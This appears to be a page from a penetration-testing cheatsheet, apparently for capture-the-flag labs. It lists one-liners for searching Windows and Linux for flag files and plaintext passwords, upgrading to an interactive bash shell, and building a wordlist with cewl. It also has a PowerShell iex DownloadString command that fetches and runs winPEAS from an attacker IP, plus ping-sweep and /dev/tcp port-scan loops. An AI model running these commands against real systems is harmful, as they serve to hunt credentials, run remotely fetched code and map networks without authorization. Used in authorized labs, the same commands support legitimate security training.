General

  • To find stuff in Windows and Linux 

dir *flag*.* /s
Grep -rnw /path/to/look  -e /file/to/look
find / 2>/dev/null | grep user.txt
find / -group admin -type f 2>/dev/null

grep -ri "password" /path/to/folder
findstr /s /i /n "password" *.*

  • To give bin/bash shell

python -c 'import pty;pty.spawn("/bin/bash")'
Or 
/bin/bash -i

  • custom wordlist

cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks >> words.txt

  • download on Windows if wget is not working

iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:80/winPEAS.ps1')

  • Ping sweep

#linux
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

#windows
(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"

  • Port scan

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

  • network

└─$ cat listening_ports.ps1 
$nets = netstat -ano | Select-String LISTENING
foreach ($n in $nets) {
    $p = $n -replace ' +', ' '
    $nar = $p.Split(' ')
    try {
        $proc = Get-Process -Id $nar[-1]
        $pname = $proc.ProcessName
        $ppath = $proc.Path
        $n -replace "$($nar[-1])", "$ppath $pname"
    } catch {
        "$n (Process not found)"
    }
}

PreviousCheatsheetNextNMAP

Last updated